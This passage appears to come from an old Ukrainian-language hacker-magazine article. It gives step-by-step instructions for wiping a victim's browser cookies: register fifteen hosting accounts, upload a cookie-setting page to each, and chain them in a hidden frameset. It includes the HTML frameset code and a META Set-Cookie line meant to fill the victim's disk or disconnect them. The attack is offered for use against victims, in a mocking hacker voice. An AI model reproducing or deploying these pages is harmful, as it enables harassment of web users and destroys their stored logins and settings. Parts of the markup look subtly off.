» Повна гидота
Друга гидота заснована на тім, що загальна кількість cookies може бути не більше 300. При переповненні ліміту, старі записи також затираються новими. Уловив думку? Затираємо всі cookies жертви. Спочатку тобі прийде завести 15 аккаунтов для сторінок на різних серверах. Заходимо на всякі narod.ru, заводимо аккаунты cook.site1.ru, cook.site2.ru і т.д. до cook.site15.ru. Потім заливаємо на кожну сторінку файл cook.htm, що ми використали в минулій гидоті. На все це в тебе повинне піти не більше години при нормальній розкладці пальців \m/. Створюємо файлик index.html і вписуємо туди наступне:
<html><head></head>
<frameset rows=”0,0,0,0,0,0,0,0,0,0,0,0,0,0,*”>
<frame scrolling=”no” noresize target=”cook.site1.ru/cook.htm”>
<frame scrolling=”no” noresize target=”cook.site2.ru/cook.htm”>
…
<frame scrolling=”no” noresize target=”cook.site15.ru/cook.htm”>
</frameset></html>
Заливаємо створений файл у будь-яке місце, наприклад на cook.narod.ru. Зайшовши на цей сайт, у користувача буде вичищатися весь cookies, накопичений роками, за пару секунд.
3. Чому не можна забити дисковий простір або зробити buffer overflow?
Справа в тому, що кожен cookie не може бути більше 4kb. Якщо ліміт перевищений, початок cookie віддаляється. Максимум, що можна зробити - забити жертві 1,2mb дискові простори при гарній якості зв’язку в жертви, або disconnect’ить жертву при поганому зв’язку. Для цього міняй рядки в cook.htm на наступне:
<META HTTP-EQUIV=”Set-Cookie” CONTENT=”XAKEP1=Тут уписуй 4kb (з вычитом 6 байт на ім’я XAKEP1); EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;”>